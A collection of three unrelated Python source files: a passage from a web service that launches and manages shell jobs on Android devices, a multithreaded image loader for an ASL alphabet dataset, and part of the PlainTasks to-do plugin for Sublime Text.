if exclusive and any(job['job_info']['env']['ANDROID_SERIAL'] == env['ANDROID_SERIAL'] and job['job_info']['exclusive'] for job in jobs):
abort(409, 'A job on device with the same ANDROID_SERIAL is running!')
if env['ANDROID_SERIAL'] not in adb.devices(status='ok') and env['ANDROID_SERIAL'] != 'no_device':
abort(404, 'No specified device attached!')
if any(job['job_info']['job_id'] == job_id for job in jobs):
abort(409, 'A job with the same job_id is running! If you want to re-run the job, please stop the running one firestly.')
job_path = os.path.abspath(os.path.join(app.config.get('jobs.path'), job_id))
shutil.rmtree(job_path, ignore_errors=True)
workspace = os.path.join(job_path, 'workspace')
os.makedirs(workspace) # make the working directory for the job
env.update({
'WORKSPACE': workspace,
'JOB_ID': job_id
})
filenames = ['repo', 'output', 'error', 'run.sh', 'job.json']
local_repo, job_out, job_err, job_script, job_info = [os.path.join(job_path, f) for f in filenames]
with open(job_script, "w") as script_f:
script_f.write(template(
'run_script',
repo=repo,
local_repo=local_repo,
init_script='%s/init_script/%s' % (
job_url,
repo.get('init_script', request.app.config.get('jobs.init_script'))
),
env=env
))
proc = sh.bash(job_script, _out=job_out, _err=job_err, _bg=True)
timestamp = time.time()
result = {
'repo': repo,
'job_id': job_id,
'job_pid': proc.pid,
'job_path': job_path,
'env': env,
'exclusive': exclusive,
'started_at': str(timestamp),
'started_datetime': str(datetime.fromtimestamp(timestamp))
}
job = {'proc': proc, 'job_info': result}
jobs.append(job)
callback = request.json.get('callback')
def proc_clear():
@lock
def check():
global jobs
if job and job['proc'].process.alive:
return True
else:
jobs.remove(job)
try:
result['exit_code'] = job['proc'].exit_code # catch the exception while touching the exit_code first time.
except:
result['exit_code'] = job['proc'].exit_code
finally:
timestamp = time.time()
result['finished_at'] = str(timestamp)
result['finished_datetime'] = str(datetime.fromtimestamp(timestamp))
write_json(job_info, result)
if callback:
import requests
try:
requests.get(callback, params={'job_id': job_id})
except:
pass
return False
while check():
time.sleep(1)
threading.Thread(target=proc_clear).start()
write_json(job_info, result)
return result
@app.get("/<job_id>/init_script/<script_name>")
def init_script(job_id, script_name):
return get_init_script(job_id, script_name)
@app.get("/<job_id>/init_script")
def default_init_script(job_id):
return get_init_script(job_id, request.app.config.get('jobs.init_script'))
def get_init_script(job_id, script_name):
init_script = os.path.abspath(os.path.join(app.config.get('jobs.path'), job_id, 'repo', script_name))
with open(init_script, 'r') as f:
init_json = yaml.load(f.read())
return template('init_script', init=init_json)
@app.delete("/<job_id>")
@app.get("/<job_id>/stop")
@lock
def terminate_job(job_id):
global jobs
for job in jobs:
if job['job_info']['job_id'] == job_id:
kill_process_and_children(job['job_info']['job_pid'])
break
else:
abort(410, 'The requested job is already dead!')
@app.get("/<job_id>")
def job_info(job_id):
jobs_path = app.config.get('jobs.path')
job_path = os.path.abspath(os.path.join(jobs_path, job_id))
return static_file('job.json', root=job_path)
@app.get("/<job_id>/stream")
def output(job_id):
lines = int(request.params.get('lines', 40))
jobs_path = app.config.get('jobs.path')
job_path = os.path.abspath(os.path.join(jobs_path, job_id))
job_out = os.path.join(job_path, 'output')
job_info = os.path.join(job_path, 'job.json')
if not os.path.exists(job_out) or not os.path.exists(job_info):
raise StopIteration
with open(job_info) as f:
info = json.load(f)
args = ['--lines=%d' % lines, job_out] if "exit_code" in info else ['--lines=%d' % lines, '--pid=%d' % info['job_pid'], '-f', job_out]
for line in sh.tail(*args, _iter=True):
yield line
@app.get("/<job_id>/files/<path:path>")
def download_file(job_id, path):
jobs_path = app.config.get('jobs.path')
job_path = os.path.abspath(os.path.join(jobs_path, job_id))
if os.path.isdir(os.path.join(job_path, path)):
return {'files': list_dir(os.path.join(job_path, path))}
else:
return static_file(path, root=job_path)
@app.get("/<job_id>/files")
@app.get("/<job_id>/files/")
def list_files(job_id):
jobs_path = app.config.get('jobs.path')
job_path = os.path.abspath(os.path.join(jobs_path, job_id))
if not os.path.exists(job_path):
abort(404, 'Oh, no! The requested path does not exists!')
return {'files': list_dir(job_path)}
@app.delete("/<job_id>/files")
@app.get("/<job_id>/remove_files")
@lock
def delete_file(job_id):
global jobs
jobs_path = app.config.get('jobs.path')
job_path = os.path.abspath(os.path.join(jobs_path, job_id))
if any(job_id == job['job_info']['job_id'] for job in jobs):
abort(409, 'The specified job is running!')
elif not os.path.exists(job_path):
abort(400, 'No specified job!')
shutil.rmtree(job_path, ignore_errors=True)
def refine_url(url):
if '?' in url:
url = url[:url.find('?')]
if url[-1] == '/':
url = url[:-1]
return url
def kill_process_and_children(pid):
parent = psutil.Process(pid)
if parent.is_running():
for child in parent.get_children(True):
if child.is_running():
child.terminate()
parent.terminate()
def next_job_id():
return str(uuid.uuid1())
def get_boolean(param):
return param if isinstance(param, bool) else param not in ['false', '0', 0, 'False']
def write_json(filename, obj):
with open(filename, 'w') as info_f:
info_f.write(json.dumps(obj, sort_keys=True, indent=2))
def list_dir(path):
if not os.path.exists(path) or not os.path.isdir(path):
return None
result = []
for f in os.listdir(path):
filename = os.path.join(path, f)
stat = os.stat(filename)
result.append({
'name': f,
'is_dir': os.path.isdir(filename),
'create_time': stat.st_ctime,
'modify_time': stat.st_mtime,
'size': stat.st_size
})
return result
|
img_loader.py
|
from keras.preprocessing import image
import sklearn.utils as skutils
from enum import Enum
import os
import numpy as np
import psutil
from threading import Thread
import math
from matplotlib import pyplot as plt
#################################################################################
# README #
#################################################################################
# Please make sure to have the two folders asl_alphabet_test & asl_alphabet_train
# under a parent directory named dataset in the root of the project
# It will not be synchronized to github due to its size (approx 1GB)
# ABSOLUTE PATH OF THIS FILE
dir_path = os.path.dirname(os.path.realpath(__file__))
# Default parameters. Do not edit unless sure of what you are doing.
bpath_def = '../../../dataset/'
trpath_def = 'asl_alphabet_train/'
tspath_def = 'asl_alphabet_test/'
classes_def = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'del', 'nothing', 'space']
class DatasetParserMode(Enum):
"""
This enumeration is used to provide elegant logic in the parser and iterator implementations
You should not make direct use of it until you are absolutely sure of what you are doing
"""
PATH_BASED = 0
CLASS_BASED = 1
class DatasetParser:
"""
This class provides parsing functionality for the dataset
It is capable of splitting into training and testing set the available data in a very fast and efficient way
It has two modes of operation: single thread and multi thread
We strongly advise you to run it in default mode (multi thread) due to performance reasons
In single core it will take a long time since JPEG -> RGB takes time and creates a lot of overhead (approx 10x)
1GB of data will be stored in more than 10GB of RAM & SWAP File if multi threading is left off.
Note 1: Multi threading will provide a HUGE boost, use it.
Note 2: The parser will spawn a number of threads equal to the number of logical CPUs available on your machine
:param multithread: Defines how the parser operates, we advise to leave this parameter to on
:param maxthreads: Specify the max number of threads that will be created
:param basepath: Leave default value unless you want to feed a different dataset base URL
:param trainingpath: Training set URL relative to basepath.
Leave default value unless you want to feed a different training dataset URL
:param testingpath: Testing set URL relative to basepath.
Leave default value unless you want to feed a different testing base URL
:param verbose: I hope you understood what this is here for :)
"""
def __init__(self,
multithread=True,
maxthreads=psutil.cpu_count(),
basepath=bpath_def,
trainingpath=trpath_def,
testingpath=tspath_def,
verbose=True,
):
self.tr_path = os.path.join(dir_path, basepath, trainingpath)
self.ts_path = os.path.join(dir_path, basepath, testingpath)
self.multithread = multithread
self.maxthreads = maxthreads
self.verbose = verbose
# This method creates objects to handle and operate the multi threaded parsing infrastructure.
# It should be called just by the class itself
def _multithread_splitter(self, n):
nthreads = min(n, self.maxthreads)
work_size = math.floor(n / nthreads)
threads = [None] * nthreads
results = [[[], []] for _ in range(nthreads)]
if self.verbose:
print('Multithread parsing is on.')
print('Available number of logical CPUs = %s, maximum number of threads set to = %s'
% (psutil.cpu_count(), self.maxthreads))
return nthreads, work_size, threads, results
# This method fetches a set of images from a set of class labels.
# This method is not used by the iterator since the fetch is not based on URLs but on class names.
def _subroutine_fetch_tr(self, selected, results=None):
x = results[0] if self.multithread else []
y = results[1] if self.multithread else []
for c in selected:
for sample in os.listdir(self.tr_path + c):
path = self.tr_path + c + '/' + sample
img_vect = self.img2array(path)
x.append(img_vect)
y.append([1 if c_ == c else 0 for c_ in classes_def])
if self.verbose:
print('Update: %s parsed' % c)
return x, y
# This method fetches a set of images from a set of URLs, usually provided by the iterator class.
def _subroutine_fetch_paths(self, paths, classes, results=None):
x = results[0]
y = results[1]
for idx, path in enumerate(paths):
img_vect = self.img2array(path)
x.append(img_vect)
y.append([1 if c_ == classes[idx] else 0 for c_ in classes_def])
return x, y if self.multithread else None
def fetch_tr(self, mode=DatasetParserMode.CLASS_BASED, *args):
"""
This method creates the vector representation of the dataset.
It is modular in that it can be called directly by the user or by the iterator
Without an iterator class, this method will merely return all the parsed images from the specified classes
No shuffling will be performed when called directly
Direct call by the user
:param mode: should always be set to DatasetParserMode.CLASS_BASED.
:param args: A sequence of classes that will make up the final result vector,
if set to, say, "A", "B", "C", the method will return images and labels for those classes only. (No shuffle)
Call by the iterator
Do not try to emulate the iterator with a direct call unless sure of what you are doing
:param mode: should always be set to DatasetParserMode.PATH_BASED.
:param args: A pair of paths/classes that will be parsed and returned in the final result
:return x: The vector representation of all the images, each has shape 200x200x3. x shape varies
:return y: The vector representation of all the classes corresponding to the images. y shape varies
"""
selected = []
if mode == DatasetParserMode.PATH_BASED:
nthreads, work_size, threads, results = self._multithread_splitter(len(args[0][1]))
if self.verbose:
print('Splitting load across %s threads..' % nthreads)
for idx in range(nthreads):
if idx + 1 != nthreads:
paths_arg = args[0][0][idx * work_size: idx * work_size + work_size]
classes_arg = args[0][1][idx * work_size: idx * work_size + work_size]
else:
paths_arg = args[0][0][idx * work_size:]
classes_arg = args[0][1][idx * work_size:]
if self.verbose:
print('Thread %s -> %s paths' % (idx, len(paths_arg)))
threads[idx] = Thread(target=self._subroutine_fetch_paths, args=(paths_arg, classes_arg, results[idx]))
threads[idx].start()
if self.verbose:
print('Suspending main thread until all other threads have finished.')
for idx in range(len(threads)):
threads[idx].join()
if self.verbose:
print('Thread %s has done parsing..' % idx)
if self.verbose:
print('All threads have finished parsing.. Combining results..')
x, y = [], []
for result in results:
for i in range(len(result[0])):
x.append(result[0][i])
y.append(result[1][i])
return np.array(x), np.array(y)
else:
# Check user input and update selection
if len(args) > 0:
for c in args:
selected.append(c.upper()) if len(c) == 1 else selected.append(c)
else:
selected = classes_def
if self.multithread:
nthreads, work_size, threads, results = self._multithread_splitter(len(selected))
if self.verbose:
print('Splitting load across %s threads..' % nthreads)
for idx in range(nthreads):
if idx + 1 != nthreads:
arg = selected[idx * work_size: idx * work_size + work_size]
else:
arg = selected[idx * work_size:]
if self.verbose:
print('Thread %s -> %s' % (idx, arg))
threads[idx] = Thread(target=self._subroutine_fetch_tr, args=(arg, results[idx]))
threads[idx].start()
if self.verbose:
print('Suspending main thread until all other threads have finished.')
for idx in range(len(threads)):
threads[idx].join()
if self.verbose:
print('Thread %s has finished.' % idx)
if self.verbose:
print('All threads have finished parsing.. Combining results..')
x, y = [], []
for result in results:
for i in range(len(result[0])):
x.append(result[0][i])
y.append(result[1][i])
return np.array(x), np.array(y)
else:
if self.verbose:
print('Multithread parsing is off')
x, y = self._subroutine_fetch_tr(selected=selected)
return np.array(x), np.array(y)
# Converts an image into a numpy RBG array 200x200x3
@staticmethod
def img2array(path):
img = image.load_img(path)
return image.img_to_array(img)
class TrainingSetIterator:
"""
This class provides a simple way to load the dataset incrementally without
filling up your ram/swap file with 10GB of data
This happens because the images originally are in JPEG but after decompression in RGB the increase their size.
HOW TO USE:
1) Instantiate specifying the used parser and the batchsize
2) Simply use it like: for x,y in instance: operate on the current batch
:param parser: Valid instance of a DatasetParser with multithread = true
:param batchsize: The size of each batch. The total training set should be a multiple of this number since each batch
should have the same size.
:param shuffle: Set it to true to shuffle the images returned in each batch
:param seed: If you want always the same batches, provide a seed for the initialization of the random algorithm
:param classes: leave empty to create batches from all the training classes, or specify your own by passing a list
"""
def __init__(self, parser, chunksize=1000, limit=None, shuffle=False, seed=None, classes=None):
self.parser = parser
self.processed = 0
self.batchsize = chunksize
self.shuffle = shuffle
self.seed = seed
self.limit = limit
self.classes = classes if classes is not None and len(classes) > 0 else classes_def
self.x, self.y = self._fetch_image_data()
# Returns the iterator for this class. You shouldn't require to call this
def get_iterator(self):
return iter(self)
# Fetches all the paths for each training images present in the dataset
# These paths will later be passed to the parser for the creation of the batch
# This method will take care of shuffling the image path and, in turn, the final batch
def _fetch_image_data(self):
x = []
y = []
print('Collecting image paths and classes..')
for c in self.classes:
elements = os.listdir(bpath_def + trpath_def + c)
l = len(elements)
x += [bpath_def + trpath_def + c + '/' + e for e in elements]
y += [c for _ in range(l)]
self.nimages = len(x)
print('Found %s images' % self.nimages)
print('Shuffling images..')
if self.shuffle:
x, y = skutils.shuffle(x, y, random_state=self.seed)
if self.nimages % self.batchsize != 0:
raise Exception('The training set size is not a multiple of the'
' batch size! Batch size can only be one of these values:\n%s'
% self.available_batchsizes(self.nimages)
)
return x, y
# This method should not be called directly but by the class itself only.
# It creates the next batch of path/class pairs that will be processed by the parser
def _get_next_batch(self):
ret_x, ret_y = [], []
for _ in range(self.batchsize):
ret_x.append(self.x.pop())
ret_y.append(self.y.pop())
return ret_x, ret_y
# This method is required to implement the iterator interface
def __iter__(self):
return self
# This method is required to implement the iterator interface
# It will provide the next batch as a x/y pair of numpy arrays
# It has been thought to be used withing for loops as specified in the class definition
# This method will pass the current batch of url/class pairs to the parser and will
# return the image/class vector pairs
def __next__(self):
if self.processed < self.nimages:
if self.limit is not None and self.processed >= self.limit:
raise StopIteration
self.currentbatch = self._get_next_batch()
self.currentbatch = self.parser.fetch_tr(DatasetParserMode.PATH_BASED,
[self.currentbatch[0], self.currentbatch[1]])
self.processed += self.batchsize
return self.currentbatch
else:
raise StopIteration
@staticmethod
def available_batchsizes(x):
# This function takes a number and prints the factors
v = ''
for i in range(1, x + 1):
if x % i == 0:
v += str(i) + '\n'
return v
"""
After various test, batch sizes around 4350 should be fine,
otherwise keep it less than of equal to
ds_parser = DatasetParser(verbose=True)
training_set = TrainingSetIterator(parser=ds_parser, shuffle=True, batchsize=3625, seed=None)
for x, y in training_set:
print('Printing the first image of this new batch..')
print('The class vector corresponding to the first image is..')
for i in range(10):
plt.imshow(x[i] / 255.)
print(y[i])
plt.show()
"""
|
PlainTasks.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sublime, sublime_plugin
import os
import re
import webbrowser
import itertools
import threading
from datetime import datetime, tzinfo, timedelta
import time
platform = sublime.platform()
ST3 = int(sublime.version()) >= 3000
if ST3:
from .APlainTasksCommon import PlainTasksBase, PlainTasksFold, get_all_projects_and_separators
else:
from APlainTasksCommon import PlainTasksBase, PlainTasksFold, get_all_projects_and_separators
sublime_plugin.ViewEventListener = object
# io is not operable in ST2 on Linux, but in all other cases io is better
# https://github.com/SublimeTextIssues/Core/issues/254
if not ST3 and platform == 'linux':
import codecs as io
else:
import io
NT = platform == 'windows'
if NT:
import subprocess
if ST3:
from datetime import timezone
else:
class timezone(tzinfo):
__slots__ = ("_offset", "_name")
def __init__(self, offset, name=None):
if not isinstance(offset, timedelta):
raise TypeError("offset must be a timedelta")
self._offset = offset
self._name = name
def utcoffset(self, dt):
return self._offset
def tzname(self, dt):
return self._name
def dst(self, dt):
return timedelta(0)
def tznow():
t = time.time()
d = datetime.fromtimestamp(t)
u = datetime.utcfromtimestamp(t)
return d.replace(tzinfo=timezone(d - u))
def check_parentheses(date_format, regex_group, is_date=False):
if is_date:
try:
parentheses = regex_group if datetime.strptime(regex_group.strip(), date_format) else ''
except ValueError:
parentheses = ''
else:
try:
parentheses = '' if datetime.strptime(regex_group.strip(), date_format) else regex_group
except ValueError:
parentheses = regex_group
return parentheses
class PlainTasksNewCommand(PlainTasksBase):
def runCommand(self, edit):
# list for ST3 support;
# reversed because with multiple selections regions would be messed up after first iteration
regions = itertools.chain(*(reversed(self.view.lines(region)) for region in reversed(list(self.view.sel()))))
header_to_task = self.view.settings().get('header_to_task', False)
# ST3 (3080) moves sel when call view.replace only by delta between original and
# new regions, so if sel is not in eol and we replace line with two lines,
# then cursor won’t be on next line as it should
sels = self.view.sel()
eol = None
for i, line in enumerate(regions):
line_contents = self.view.substr(line).rstrip()
not_empty_line = re.match('^(\s*)(\S.*)$', self.view.substr(line))
empty_line = re.match('^(\s+)$', self.view.substr(line))
current_scope = self.view.scope_name(line.a)
eol = line.b # need for ST3 when new content has line break
if 'item' in current_scope:
grps = not_empty_line.groups()
line_contents = self.view.substr(line) + '\n' + grps[0] + self.open_tasks_bullet + self.tasks_bullet_space
elif 'header' in current_scope and line_contents and not header_to_task:
grps = not_empty_line.groups()
line_contents = self.view.substr(line) + '\n' + grps[0] + self.before_tasks_bullet_spaces + self.open_tasks_bullet + self.tasks_bullet_space
elif 'separator' in current_scope:
grps = not_empty_line.groups()
line_contents = self.view.substr(line) + '\n' + grps[0] + self.before_tasks_bullet_spaces + self.open_tasks_bullet + self.tasks_bullet_space
elif not ('header' and 'separator') in current_scope or header_to_task:
eol = None
if not_empty_line:
grps = not_empty_line.groups()
line_contents = (grps[0] if len(grps[0]) > 0 else self.before_tasks_bullet_spaces) + self.open_tasks_bullet + self.tasks_bullet_space + grps[1]
elif empty_line: # only whitespaces
grps = empty_line.groups()
line_contents = grps[0] + self.open_tasks_bullet + self.tasks_bullet_space
else: # completely empty, no whitespaces
line_contents = self.before_tasks_bullet_spaces + self.open_tasks_bullet + self.tasks_bullet_space
else:
print('oops, need to improve PlainTasksNewCommand')
if eol:
# move cursor to eol of original line, workaround for ST3
sels.subtract(sels[~i])
sels.add(sublime.Region(eol, eol))
self.view.replace(edit, line, line_contents)
# convert each selection to single cursor, ready to type
new_selections = []
for sel in list(self.view.sel()):
eol = self.view.line(sel).b
new_selections.append(sublime.Region(eol, eol))
self.view.sel().clear()
for sel in new_selections:
self.view.sel().add(sel)
PlainTasksStatsStatus.set_stats(self.view)
self.view.run_command('plain_tasks_toggle_highlight_past_due')
class PlainTasksNewWithDateCommand(PlainTasksBase):
def runCommand(self, edit):
self.view.run_command('plain_tasks_new')
sels = list(self.view.sel())
suffix = ' @created%s' % tznow().strftime(self.date_format)
points = []
for s in reversed(sels):
if self.view.substr(sublime.Region(s.b - 2, s.b)) == ' ':
point = s.b - 2 # keep double whitespace at eol
else:
point = s.b
self.view.insert(edit, point, suffix)
points.append(point)
self.view.sel().clear()
offset = len(suffix)
for i, sel in enumerate(sels):
self.view.sel().add(sublime.Region(points[~i] + i*offset, points[~i] + i*offset))
class PlainTasksCompleteCommand(PlainTasksBase):
def runCommand(self, edit):
original = [r for r in self.view.sel()]
done_line_end, now = self.format_line_end(self.done_tag, tznow())
offset = len(done_line_end)
rom = r'^(\s*)(\[\s\]|.)(\s*.*)$'
rdm = r'''
(?x)^(\s*)(\[x\]|.) # 0,1 indent & bullet
(\s*[^\b]*?(?:[^\@]|(?<!\s)\@|\@(?=\s))*?\s*) # 2 very task
(?=
((?:\s@done|@project|@[wl]asted|$).*) # 3 ending either w/ done or w/o it & no date
| # or
(?:[ \t](\([^()]*\))\s*([^@]*|(?:@project|@[wl]asted).*))?$ # 4 date & possible project tag after
)
''' # rcm is the same, except bullet & ending
rcm = r'^(\s*)(\[\-\]|.)(\s*[^\b]*?(?:[^\@]|(?<!\s)\@|\@(?=\s))*?\s*)(?=((?:\s@cancelled|@project|@[wl]asted|$).*)|(?:[ \t](\([^()]*\))\s*([^@]*|(?:@project|@[wl]asted).*))?$)'
started = r'^\s*[^\b]*?\s*@started(\([\d\w,\.:\-\/ @]*\)).*$'
toggle = r'@toggle(\([\d\w,\.:\-\/ @]*\))'
regions = itertools.chain(*(reversed(self.view.lines(region)) for region in reversed(list(self.view.sel()))))
for line in regions:
line_contents = self.view.substr(line)
open_matches = re.match(rom, line_contents, re.U)
done_matches = re.match(rdm, line_contents, re.U)
canc_matches = re.match(rcm, line_contents, re.U)
started_matches = re.findall(started, line_contents, re.U)
toggle_matches = re.findall(toggle, line_contents, re.U)
done_line_end = done_line_end.rstrip()
if line_contents.endswith(' '):
done_line_end += ' ' # keep double whitespace at eol
dblspc = ' '
else:
dblspc = ''
current_scope = self.view.scope_name(line.a)
if 'pending' in current_scope:
grps = open_matches.groups()
len_dle = self.view.insert(edit, line.end(), done_line_end)
replacement = u'%s%s%s' % (grps[0], self.done_tasks_bullet, grps[2].rstrip())
self.view.replace(edit, line, replacement)
self.view.run_command(
'plain_tasks_calculate_time_for_task', {
'started_matches': started_matches,
'toggle_matches': toggle_matches,
'now': now,
'eol': line.a + len(replacement) + len_dle}
)
elif 'header' in current_scope:
eol = self.view.insert(edit, line.end(), done_line_end)
self.view.run_command(
'plain_tasks_calculate_time_for_task', {
'started_matches': started_matches,
'toggle_matches': toggle_matches,
'now': now,
'eol': line.end() + eol}
)
indent = re.match('^(\s*)\S', line_contents, re.U)
self.view.insert(edit, line.begin() + len(indent.group(1)), '%s ' % self.done_tasks_bullet)
self.view.run_command('plain_tasks_calculate_total_time_for_project', {'start': line.a})
elif 'completed' in current_scope:
grps = done_matches.groups()
parentheses = check_parentheses(self.date_format, grps[4] or '')
replacement = u'%s%s%s%s' % (grps[0], self.open_tasks_bullet, grps[2], parentheses)
self.view.replace(edit, line, replacement.rstrip() + dblspc)
offset = -offset
elif 'cancelled' in current_scope:
grps = canc_matches.groups()
len_dle = self.view.insert(edit, line.end(), done_line_end)
parentheses = check_parentheses(self.date_format, grps[4] or '')
replacement = u'%s%s%s%s' % (grps[0], self.done_tasks_bullet, grps[2], parentheses)
self.view.replace(edit, line, replacement.rstrip())
offset = -offset
self.view.run_command(
'plain_tasks_calculate_time_for_task', {
'started_matches': started_matches,
'toggle_matches': toggle_matches,
'now': now,
'eol': line.a + len(replacement) + len_dle}
)
self.view.sel().clear()
for ind, pt in enumerate(original):
ofs = ind * offset
new_pt = sublime.Region(pt.a + ofs, pt.b + ofs)
self.view.sel().add(new_pt)
PlainTasksStatsStatus.set_stats(self.view)
self.view.run_command('plain_tasks_toggle_highlight_past_due')
class PlainTasksCancelCommand(PlainTasksBase):
def runCommand(self, edit):
original = [r for r in self.view.sel()]
canc_line_end, now = self.format_line_end(self.canc_tag, tznow())
offset = len(canc_line_end)
rom = r'^(\s*)(\[\s\]|.)(\s*.*)$'
rdm = r'^(\s*)(\[x\]|.)(\s*[^\b]*?(?:[^\@]|(?<!\s)\@|\@(?=\s))*?\s*)(?=((?:\s@done|@project|@[wl]asted|$).*)|(?:[ \t](\([^()]*\))\s*([^@]*|(?:@project|@[wl]asted).*))?$)'
rcm = r'^(\s*)(\[\-\]|.)(\s*[^\b]*?(?:[^\@]|(?<!\s)\@|\@(?=\s))*?\s*)(?=((?:\s@cancelled|@project|@[wl]asted|$).*)|(?:[ \t](\([^()]*\))\s*([^@]*|(?:@project|@[wl]asted).*))?$)'
started = r'^\s*[^\b]*?\s*@started(\([\d\w,\.:\-\/ @]*\)).*$'
toggle = r'@toggle(\([\d\w,\.:\-\/ @]*\))'
regions = itertools.chain(*(reversed(self.view.lines(region)) for region in reversed(list(self.view.sel()))))
for line in regions:
line_contents = self.view.substr(line)
open_matches = re.match(rom, line_contents, re.U)
done_matches = re.match(rdm, line_contents, re.U)
canc_matches = re.match(rcm, line_contents, re.U)
started_matches = re.findall(started, line_contents, re.U)
toggle_matches = re.findall(toggle, line_contents, re.U)
canc_line_end = canc_line_end.rstrip()
if line_contents.endswith(' '):
canc_line_end += ' ' # keep double whitespace at eol
dblspc = ' '
else:
dblspc = ''
current_scope = self.view.scope_name(line.a)
if 'pending' in current_scope:
grps = open_matches.groups()
len_cle = self.view.insert(edit, line.end(), canc_line_end)
replacement = u'%s%s%s' % (grps[0], self.canc_tasks_bullet, grps[2].rstrip())
self.view.replace(edit, line, replacement)
self.view.run_command(
'plain_tasks_calculate_time_for_task', {
'started_matches': started_matches,
'toggle_matches': toggle_matches,
'now': now,
'eol': line.a + len(replacement) + len_cle,
'tag': 'wasted'}
)
elif 'header' in current_scope:
eol = self.view.insert(edit, line.end(), canc_line_end)
self.view.run_command(
'plain_tasks_calculate_time_for_task', {
'started_matches': started_matches,
'toggle_matches': toggle_matches,
'now': now,
'eol': line.end() + eol,
'tag': 'wasted'}
)
indent = re.match('^(\s*)\S', line_contents, re.U)
self.view.insert(edit, line.begin() + len(indent.group(1)), '%s ' % self.canc_tasks_bullet)
self.view.run_command('plain_tasks_calculate_total_time_for_project', {'start': line.a})
elif 'completed' in current_scope:
sublime.status_message('You cannot cancel what have been done, can you?')
# grps = done_matches.groups()
# parentheses = check_parentheses(self.date_format, grps[4] or '')
# replacement = u'%s%s%s%s' % (grps[0], self.canc_tasks_bullet, grps[2], parentheses)
# self.view.replace(edit, line, replacement.rstrip())
# offset = -offset
elif 'cancelled' in current_scope:
grps = canc_matches.groups()
parentheses = check_parentheses(self.date_format, grps[4] or '')
replacement = u'%s%s%s%s' % (grps[0], self.open_tasks_bullet, grps[2], parentheses)
self.view.replace(edit, line, replacement.rstrip() + dblspc)
offset = -offset
self.view.sel().clear()
for ind, pt in enumerate(original):
ofs = ind * offset
new_pt = sublime.Region(pt.a + ofs, pt.b + ofs)
self.view.sel().add(new_pt)
PlainTasksStatsStatus.set_stats(self.view)
self.view.run_command('plain_tasks_toggle_highlight_past_due')
class PlainTasksArchiveCommand(PlainTasksBase):
def runCommand(self, edit, partial=False):
rds = 'meta.item.todo.completed'
rcs = 'meta.item.todo.cancelled'
# finding archive section
archive_pos = self.view.find(self.archive_name, 0, sublime.LITERAL)
if partial:
all_tasks = self.get_archivable_tasks_within_selections()
else:
all_tasks = self.get_all_archivable_tasks(archive_pos, rds, rcs)
if not all_tasks:
sublime.status_message('Nothing to archive')
else:
if archive_pos and archive_pos.a > 0:
line = self.view.full_line(archive_pos).end()
else:
create_archive = u'\n\n___________________\n%s\n' % self.archive_name
self.view.insert(edit, self.view.size(), create_archive)
line = self.view.size()
projects = get_all_projects_and_separators(self.view)
# adding tasks to archive section
for task in all_tasks:
line_content = self.view.substr(task)
match_task = re.match(r'^\s*(\[[x-]\]|.)(\s+.*$)', line_content, re.U)
current_scope = self.view.scope_name(task.a)
if rds in current_scope or rcs in current_scope:
pr = self.get_task_project(task, projects)
if self.project_postfix:
eol = u'{0}{1}{2}{3}\n'.format(
self.before_tasks_bullet_spaces,
line_content.strip(),
(u' @project(%s)' % pr) if pr else '',
' ' if line_content.endswith(' ') else '')
else:
eol = u'{0}{1}{2}{3}\n'.format(
self.before_tasks_bullet_spaces,
match_task.group(1), # bullet
(u'%s%s:' % (self.tasks_bullet_space, pr)) if pr else '',
match_task.group(2)) # very task
else:
eol = u'{0}{1}\n'.format(self.before_tasks_bullet_spaces * 2, line_content.lstrip())
line += self.view.insert(edit, line, eol)
# remove moved tasks (starting from the last one otherwise it screw up regions after the first delete)
for task in reversed(all_tasks):
self.view.erase(edit, self.view.full_line(task))
self.view.run_command('plain_tasks_sort_by_date')
def get_task_project(self, task, projects):
index = -1
for ind, pr in enumerate(projects):
if task < pr:
if ind > 0:
index = ind-1
break
#if there is no projects for task - return empty string
if index == -1:
return ''
prog = re.compile(r'^\n*(\s*)(.+):(?=\s|$)\s*(\@[^\s]+(\(.*?\))?\s*)*')
hierarhProject = ''
if index >= 0:
depth = re.match(r"\s*", self.view.substr(self.view.line(task))).group()
while index >= 0:
strProject = self.view.substr(projects[index])
if prog.match(strProject):
spaces = prog.match(strProject).group(1)
if len(spaces) < len(depth):
hierarhProject = prog.match(strProject).group(2) + ((" / " + hierarhProject) if hierarhProject else '')
depth = spaces
if len(depth) == 0:
break
else:
sep = re.compile(r'(^\s*)---.{3,5}---+$')
spaces = sep.match(strProject).group(1)
if len(spaces) < len(depth):
depth = spaces
if len(depth) == 0:
break
index -= 1
if not hierarhProject:
return ''
else:
return hierarhProject
def get_task_note(self, task, tasks):
note_line = task.end() + 1
while self.view.scope_name(note_line) == 'text.todo notes.todo ':
note = self.view.line(note_line)
if note not in tasks:
tasks.append(note)
note_line = self.view.line(note_line).end() + 1
def get_all_archivable_tasks(self, archive_pos, rds, rcs):
done_tasks = [i for i in self.view.find_by_selector(rds) if i.a < (archive_pos.a if archive_pos and archive_pos.a > 0 else self.view.size())]
for i in done_tasks:
self.get_task_note(i, done_tasks)
canc_tasks = [i for i in self.view.find_by_selector(rcs) if i.a < (archive_pos.a if archive_pos and archive_pos.a > 0 else self.view.size())]
for i in canc_tasks:
self.get_task_note(i, canc_tasks)
all_tasks = done_tasks + canc_tasks
all_tasks.sort()
return all_tasks
def get_archivable_tasks_within_selections(self):
all_tasks = []
for region in self.view.sel():
for l in self.view.lines(region):
line = self.view.line(l)
if ('completed' in self.view.scope_name(line.a)) or ('cancelled' in self.view.scope_name(line.a)):
all_tasks.append(line)
self.get_task_note(line, all_tasks)
return all_tasks
class PlainTasksNewTaskDocCommand(sublime_plugin.WindowCommand):
def run(self):
view = self.window.new_file()
view.settings().add_on_change('color_scheme', lambda: self.set_proper_scheme(view))
view.set_syntax_file('Packages/PlainTasks/PlainTasks.sublime-syntax' if ST3 else
'Packages/PlainTasks/PlainTasks.tmLanguage')
def set_proper_scheme(self, view):
if view.id() != sublime.active_window().active_view().id():
return
pts = sublime.load_settings('PlainTasks.sublime-settings')
if view.settings().get('color_scheme') == pts.get('color_scheme'):
return
# Since we cannot create file with syntax, there is moment when view has no settings,
# but it is activated, so some plugins (e.g. Color Highlighter) set wrong color scheme
view.settings().set('color_scheme', pts.get('color_scheme'))
class PlainTasksOpenUrlCommand(sublime_plugin.TextCommand):
#It is horrible regex but it works perfectly
